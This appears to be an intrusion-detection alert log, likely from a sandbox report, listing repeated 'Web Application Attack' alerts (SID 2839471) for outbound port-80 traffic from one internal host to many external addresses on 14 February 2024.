    Timestamp:192.168.2.1595.217.16.10152880802839471 02/14/24-09:31:13.514224
    SID:2839471
    Source Port:52880
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.86.125.8955130802839471 02/14/24-09:29:40.363153
    SID:2839471
    Source Port:55130
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.221.180.11948634802839471 02/14/24-09:31:11.284539
    SID:2839471
    Source Port:48634
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.214.235.22136028802839471 02/14/24-09:31:17.920887
    SID:2839471
    Source Port:36028
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.60.15.22439526802839471 02/14/24-09:29:28.156474
    SID:2839471
    Source Port:39526
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.221.6643204802839471 02/14/24-09:29:35.298891
    SID:2839471
    Source Port:43204
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.143.181.9839556802839471 02/14/24-09:30:52.937642
    SID:2839471
    Source Port:39556
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.217.183.14157652802839471 02/14/24-09:30:37.201439
    SID:2839471
    Source Port:57652
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.127.1545086802839471 02/14/24-09:28:47.585598
    SID:2839471
    Source Port:45086
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.105.38.9855688802839471 02/14/24-09:29:01.649846
    SID:2839471
    Source Port:55688
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.42.211.5533254802839471 02/14/24-09:31:06.727203
    SID:2839471
    Source Port:33254
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.56.20.1555822802839471 02/14/24-09:30:06.605735
    SID:2839471
    Source Port:55822
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.203.21236494802839471 02/14/24-09:30:50.503021
    SID:2839471
    Source Port:36494
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.0.142.18850632802839471 02/14/24-09:30:27.512422
    SID:2839471
    Source Port:50632
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.41.16842310802839471 02/14/24-09:30:24.695697
    SID:2839471
    Source Port:42310
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.170.82.19952622802839471 02/14/24-09:31:13.467215
    SID:2839471
    Source Port:52622
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.218.138.4242472802839471 02/14/24-09:30:26.278524
    SID:2839471
    Source Port:42472
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.14.3748976802839471 02/14/24-09:30:24.696063
    SID:2839471
    Source Port:48976
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.46.0.15657584802839471 02/14/24-09:31:16.887660
    SID:2839471
    Source Port:57584
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.231.12333398802839471 02/14/24-09:30:24.256489
    SID:2839471
    Source Port:33398
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.175.21351674802839471 02/14/24-09:30:50.097654
    SID:2839471
    Source Port:51674
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.126.91.17755850802839471 02/14/24-09:29:13.338241
    SID:2839471
    Source Port:55850
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.74.59.15052534802839471 02/14/24-09:29:00.651651
    SID:2839471
    Source Port:52534
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.205.13259690802839471 02/14/24-09:30:43.758353
    SID:2839471
    Source Port:59690
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.74.127.16356520802839471 02/14/24-09:31:14.865359
    SID:2839471
    Source Port:56520
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.167.233.639906802839471 02/14/24-09:29:22.020632
    SID:2839471
    Source Port:39906
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.85.242.20144188802839471 02/14/24-09:30:08.929550
    SID:2839471
    Source Port:44188
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.99.179.5658608802839471 02/14/24-09:29:33.638348
    SID:2839471
    Source Port:58608
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.105.18943004802839471 02/14/24-09:29:08.720880
    SID:2839471
    Source Port:43004
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.111.254.5749402802839471 02/14/24-09:29:56.727571
    SID:2839471
    Source Port:49402
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.168.249.2636194802839471 02/14/24-09:29:33.449356
    SID:2839471
    Source Port:36194
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.212.218.1837846802839471 02/14/24-09:30:19.189345
    SID:2839471
    Source Port:37846
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.217.80.17439124802839471 02/14/24-09:29:42.740948
    SID:2839471
    Source Port:39124
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.128.129.6141502802839471 02/14/24-09:29:33.421569
    SID:2839471
    Source Port:41502
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.192.19.9746576802839471 02/14/24-09:29:48.420063
    SID:2839471
    Source Port:46576
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.68.75.4935480802839471 02/14/24-09:30:11.639631
    SID:2839471
    Source Port:35480
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.216.115.5034804802839471 02/14/24-09:29:14.015912
    SID:2839471
    Source Port:34804
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.5.12358368802839471 02/14/24-09:29:19.170435
    SID:2839471
    Source Port:58368
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.240.14335680802839471 02/14/24-09:29:24.661179
    SID:2839471
    Source Port:35680
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.58.72.21538812802839471 02/14/24-09:30:59.762543
    SID:2839471
    Source Port:38812
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.86.81.6052832802839471 02/14/24-09:30:48.149472
    SID:2839471
    Source Port:52832
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.35.40.9057198802839471 02/14/24-09:28:56.307430
    SID:2839471
    Source Port:57198
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.147.150.4442840802839471 02/14/24-09:30:08.412746
    SID:2839471
    Source Port:42840
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.80.219.17451486802839471 02/14/24-09:29:56.726004
    SID:2839471
    Source Port:51486
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.221.100.24851888802839471 02/14/24-09:30:03.422935
    SID:2839471
    Source Port:51888
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.124.32.5657990802839471 02/14/24-09:30:04.967124
    SID:2839471
    Source Port:57990
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.221.4.17653670802839471 02/14/24-09:30:26.259209
    SID:2839471
    Source Port:53670
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.47.11.21053612802839471 02/14/24-09:29:05.762313
    SID:2839471
    Source Port:53612
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.66.132.1335420802839471 02/14/24-09:29:42.765276
    SID:2839471
    Source Port:35420
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.79.100.4034114802839471 02/14/24-09:30:14.762774
    SID:2839471
    Source Port:34114
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.149.181.11556704802839471 02/14/24-09:28:46.591603
    SID:2839471
    Source Port:56704
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.67.8.23960210802839471 02/14/24-09:30:06.552746
    SID:2839471
    Source Port:60210
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.226.5242386802839471 02/14/24-09:30:24.466282
    SID:2839471
    Source Port:42386
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.182.22458762802839471 02/14/24-09:29:24.857767
    SID:2839471
    Source Port:58762
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.203.250.10053678802839471 02/14/24-09:29:44.339565
    SID:2839471
    Source Port:53678
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.124.14643754802839471 02/14/24-09:30:48.383690
    SID:2839471
    Source Port:43754
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.217.133.22457376802839471 02/14/24-09:29:38.541946
    SID:2839471
    Source Port:57376
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.119.167.11553226802839471 02/14/24-09:28:46.591804
    SID:2839471
    Source Port:53226
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.85.71.19159590802839471 02/14/24-09:29:24.925955
    SID:2839471
    Source Port:59590
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.110.208.13752208802839471 02/14/24-09:29:56.739664
    SID:2839471
    Source Port:52208
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.138.144.21753080802839471 02/14/24-09:30:19.384540
    SID:2839471
    Source Port:53080
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.196.74.19359552802839471 02/14/24-09:29:03.444660
    SID:2839471
    Source Port:59552
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.83.36.6245418802839471 02/14/24-09:30:36.980156
    SID:2839471
    Source Port:45418
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.198.144.14234420802839471 02/14/24-09:30:26.486090
    SID:2839471
    Source Port:34420
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.79.101.5458964802839471 02/14/24-09:29:09.728994
    SID:2839471
    Source Port:58964
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.168.50.10039236802839471 02/14/24-09:29:03.691469
    SID:2839471
    Source Port:39236
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.59.50.1939022802839471 02/14/24-09:29:38.813057
    SID:2839471
    Source Port:39022
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.211.212.4053772802839471 02/14/24-09:30:59.478488
    SID:2839471
    Source Port:53772
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.160.15060372802839471 02/14/24-09:29:35.305382
    SID:2839471
    Source Port:60372
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.175.21351628802839471 02/14/24-09:30:48.297254
    SID:2839471
    Source Port:51628
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.191.24239406802839471 02/14/24-09:30:59.704532
    SID:2839471
    Source Port:39406
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.185.3740624802839471 02/14/24-09:29:15.215315
    SID:2839471
    Source Port:40624
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.115.16842972802839471 02/14/24-09:30:48.373876
    SID:2839471
    Source Port:42972
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.93.4944210802839471 02/14/24-09:29:24.436194
    SID:2839471
    Source Port:44210
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.154.22659490802839471 02/14/24-09:30:41.261433
    SID:2839471
    Source Port:59490
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.79.31.24633940802839471 02/14/24-09:30:53.704867
    SID:2839471
    Source Port:33940
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.215.242.2152620802839471 02/14/24-09:28:47.609966
    SID:2839471
    Source Port:52620
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.217.87.4746680802839471 02/14/24-09:29:38.542183
    SID:2839471
    Source Port:46680
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.169.26.22634884802839471 02/14/24-09:30:33.911087
    SID:2839471
    Source Port:34884
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.213.39.9534188802839471 02/14/24-09:29:27.776716
    SID:2839471
    Source Port:34188
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.32.110.17057918802839471 02/14/24-09:29:42.295082
    SID:2839471
    Source Port:57918
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.58.194.5851742802839471 02/14/24-09:30:10.328928
    SID:2839471
    Source Port:51742
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.30.175.16553522802839471 02/14/24-09:29:03.417771
    SID:2839471
    Source Port:53522
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.221.127.19752636802839471 02/14/24-09:30:26.255701
    SID:2839471
    Source Port:52636
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.142.35.9154212802839471 02/14/24-09:30:10.010975
    SID:2839471
    Source Port:54212
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.221.199.10835078802839471 02/14/24-09:28:56.286077
    SID:2839471
    Source Port:35078
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.43.238.15938722802839471 02/14/24-09:30:55.714628
    SID:2839471
    Source Port:38722
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.68.46.23459204802839471 02/14/24-09:30:24.482803
    SID:2839471
    Source Port:59204
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.197.165.13456052802839471 02/14/24-09:29:03.449616
    SID:2839471
    Source Port:56052
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.86.112.12039662802839471 02/14/24-09:30:29.871939
    SID:2839471
    Source Port:39662
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.208.20443462802839471 02/14/24-09:31:13.060820
    SID:2839471
    Source Port:43462
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.217.236.4644412802839471 02/14/24-09:29:29.700847
    SID:2839471
    Source Port:44412
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.171.185.10138516802839471 02/14/24-09:29:36.795584
    SID:2839471
    Source Port:38516
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.86.111.17755042802839471 02/14/24-09:30:37.233959
    SID:2839471
    Source Port:55042
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.96.62.21437116802839471 02/14/24-09:30:03.395436
    SID:2839471
    Source Port:37116
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.78.232.11339258802839471 02/14/24-09:30:24.712098
    SID:2839471
    Source Port:39258
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.165.230.1047848802839471 02/14/24-09:30:19.435955
    SID:2839471
    Source Port:47848
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.135.211.25543794802839471 02/14/24-09:28:47.121988
    SID:2839471
    Source Port:43794
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.158.120.20859996802839471 02/14/24-09:31:09.292148
    SID:2839471
    Source Port:59996
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.0.98.8853598802839471 02/14/24-09:29:56.976905
    SID:2839471
    Source Port:53598
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.99.29.24933758802839471 02/14/24-09:29:32.010329
    SID:2839471
    Source Port:33758
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.85.26.1732844802839471 02/14/24-09:30:52.921987
    SID:2839471
    Source Port:32844
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.90.95.7346424802839471 02/14/24-09:31:06.192447
    SID:2839471
    Source Port:46424
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.165.139.21060806802839471 02/14/24-09:28:47.591618
    SID:2839471
    Source Port:60806
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.90.88.9033838802839471 02/14/24-09:30:11.038672
    SID:2839471
    Source Port:33838
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.198.38.7944240802839471 02/14/24-09:30:31.340101
    SID:2839471
    Source Port:44240
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.210.96.5533542802839471 02/14/24-09:29:24.411294
    SID:2839471
    Source Port:33542
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.177.57.839686802839471 02/14/24-09:29:48.325813
    SID:2839471
    Source Port:39686
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.30.5058040802839471 02/14/24-09:30:14.753452
    SID:2839471
    Source Port:58040
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.41.5258672802839471 02/14/24-09:30:19.416264
    SID:2839471
    Source Port:58672
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.149.4249860802839471 02/14/24-09:31:17.899931
    SID:2839471
    Source Port:49860
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.203.6955932802839471 02/14/24-09:28:56.038983
    SID:2839471
    Source Port:55932
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.140.6458794802839471 02/14/24-09:29:42.743456
    SID:2839471
    Source Port:58794
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.221.78.21058378802839471 02/14/24-09:28:46.581700
    SID:2839471
    Source Port:58378
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.124.165.10839986802839471 02/14/24-09:29:54.239906
    SID:2839471
    Source Port:39986
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.111.242.7943940802839471 02/14/24-09:30:19.400442
    SID:2839471
    Source Port:43940
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.249.66.4644304802839471 02/14/24-09:30:19.848334
    SID:2839471
    Source Port:44304
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.78.6946436802839471 02/14/24-09:30:14.535525
    SID:2839471
    Source Port:46436
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.174.28.16435644802839471 02/14/24-09:30:37.193511
    SID:2839471
    Source Port:35644
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.216.173.12433430802839471 02/14/24-09:29:15.246798
    SID:2839471
    Source Port:33430
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.13.121.10151742802839471 02/14/24-09:30:03.594758
    SID:2839471
    Source Port:51742
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.197.81.18759498802839471 02/14/24-09:29:48.436887
    SID:2839471
    Source Port:59498
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.86.125.19951396802839471 02/14/24-09:30:59.785772
    SID:2839471
    Source Port:51396
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.56.209.4359496802839471 02/14/24-09:29:15.309796
    SID:2839471
    Source Port:59496
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.168.102.2948300802839471 02/14/24-09:29:26.534411
    SID:2839471
    Source Port:48300
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.179.193.10038656802839471 02/14/24-09:30:11.612228
    SID:2839471
    Source Port:38656
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.66.16658512802839471 02/14/24-09:30:59.454642
    SID:2839471
    Source Port:58512
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.47.167.6552484802839471 02/14/24-09:28:47.589849
    SID:2839471
    Source Port:52484
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.147.5.6334948802839471 02/14/24-09:29:15.554778
    SID:2839471
    Source Port:34948
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.10.162.1247362802839471 02/14/24-09:29:38.317134
    SID:2839471
    Source Port:47362
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.136.4034484802839471 02/14/24-09:29:56.539233
    SID:2839471
    Source Port:34484
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.221.34.1853612802839471 02/14/24-09:30:21.250100
    SID:2839471
    Source Port:53612
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.201.14860120802839471 02/14/24-09:28:47.570065
    SID:2839471
    Source Port:60120
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.83.37.17739940802839471 02/14/24-09:30:16.369828
    SID:2839471
    Source Port:39940
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.57.108.5152274802839471 02/14/24-09:29:09.207734
    SID:2839471
    Source Port:52274
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.221.37.3152232802839471 02/14/24-09:30:43.927469
    SID:2839471
    Source Port:52232
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.25.57.4354648802839471 02/14/24-09:31:01.795046
    SID:2839471
    Source Port:54648
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.175.243.5660060802839471 02/14/24-09:28:47.077014
    SID:2839471
    Source Port:60060
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.163.217.7343390802839471 02/14/24-09:30:19.421156
    SID:2839471
    Source Port:43390
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.214.134.4852658802839471 02/14/24-09:29:24.833034
    SID:2839471
    Source Port:52658
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.153.45.13652326802839471 02/14/24-09:30:14.754813
    SID:2839471
    Source Port:52326
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.188.3035808802839471 02/14/24-09:29:56.736509
    SID:2839471
    Source Port:35808
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.158.24.6460290802839471 02/14/24-09:30:19.417837
    SID:2839471
    Source Port:60290
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.221.133.9153166802839471 02/14/24-09:29:29.476153
    SID:2839471
    Source Port:53166
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.170.92.2049376802839471 02/14/24-09:30:09.848136
    SID:2839471
    Source Port:49376
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.186.69.7241012802839471 02/14/24-09:30:59.252865
    SID:2839471
    Source Port:41012
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.29.170.23946436802839471 02/14/24-09:29:06.146720
    SID:2839471
    Source Port:46436
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.170.66.22239634802839471 02/14/24-09:30:41.244571
    SID:2839471
    Source Port:39634
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.198.55.12144878802839471 02/14/24-09:29:29.505273
    SID:2839471
    Source Port:44878
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.221.47.14555876802839471 02/14/24-09:29:33.666096
    SID:2839471
    Source Port:55876
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.56.127.17951830802839471 02/14/24-09:29:19.093571
    SID:2839471
    Source Port:51830
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.217.145.16549690802839471 02/14/24-09:29:47.818025
    SID:2839471
    Source Port:49690
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.247.12743780802839471 02/14/24-09:29:51.437945
    SID:2839471
    Source Port:43780
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.13.121.10151690802839471 02/14/24-09:30:04.630815
    SID:2839471
    Source Port:51690
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.169.188.1737016802839471 02/14/24-09:31:13.059075
    SID:2839471
    Source Port:37016
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.203.25038158802839471 02/14/24-09:30:09.850044
    SID:2839471
    Source Port:38158
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.179.146.20359722802839471 02/14/24-09:30:44.413481
    SID:2839471
    Source Port:59722
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.63.12.22350630802839471 02/14/24-09:30:00.971656
    SID:2839471
    Source Port:50630
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.100.75.21356082802839471 02/14/24-09:30:31.540515
    SID:2839471
    Source Port:56082
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.166.250.545294802839471 02/14/24-09:29:03.354973
    SID:2839471
    Source Port:45294
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1588.218.158.21359262802839471 02/14/24-09:29:33.661619
    SID:2839471
    Source Port:59262
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.15112.186.20.3860010802839471 02/14/24-09:31:05.727048
    SID:2839471
    Source Port:60010
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:192.168.2.1595.101.220.17246160802839471 02/14/24-09:31:06.716395
    SID:2839471
    Source Port:46160
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
